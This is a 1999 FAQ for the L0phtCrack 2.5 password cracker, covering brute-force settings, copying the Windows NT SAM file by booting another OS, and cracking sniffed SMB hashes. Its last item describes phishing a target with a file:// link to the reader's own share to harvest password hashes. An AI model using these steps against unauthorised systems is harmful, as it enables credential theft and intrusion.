L0phtCrack 2.5 FAQ

Last updated 1/02/99

    
1. Can I use a custom character set for brute forcing?

Yes.  Just enter the character set you want into the Tools Options dialog
box in the Character Set field.  It will be saved with the file you are
cracking if you decide to stop and start cracking. 
2. How do I get the SAM file?  It seems locked.

The SAM file in \winnt\system32\config is locked by the OS so that it
cannot be read while NT is running.  In order to read this file you will
need to boot an alternate operating system such as Linux or DOS. Usually
this file will be on an NTFS partition. Linux can read NTFS natively but
DOS will need a special program to access the partition.  Go to
www.sysinternals.com and download NTFSDOS.  It will allow you to boot off
a DOS floppy, run NTFSDOS, and copy files from an NTFS partition.  You
can now copy the SAM file and bring it to the machine running l0phtcrack
to be imported.
 
 2.
Cracking sniffer dumps seems to take a long time. Is this right?

Cracking the captured challenge/response hashes from a network capture
takes a bit longer for one password than its counterpart gotten from a
registry dump.  The big slowdown with the network capture cracking is that
each hash is encrypted with a unique challenge so that the work done
cracking one password cannot be used again to crack another.  This means
that the time to completion scales linearly as you add password hashes to
crack. 

10 network challenge/response hashes will take 10 times longer to crack
than just one.  Ouch, that could take a long time.  This type of cracking
really needs to be targetted towards particular passwords to be
effective. We estimate network challenge/response cracking to take 10
times longer than normal password hash cracking.

3. I get "cannot open network device or do not have sufficient
privileges to install packet driver."
    What's wrong?

You need to have administrator privileges to do network sniffing.  Or at
least you have to have an administrator run l0phtcrack and choose SMB
Network Capture once to have the packet driver installed.

4. I am on a switched network and can't capture anyone elses password
hashes.  Am I out of luck?

No.  You just have to make the hashes come to you.  Send out an email to
your target, whether it is an individual or a whole company. Include in
it a URL in the form of
file:////yourcomputer/sharename/message.html.  When people click on that
URL
they will be sending their password hashes to you for authentication.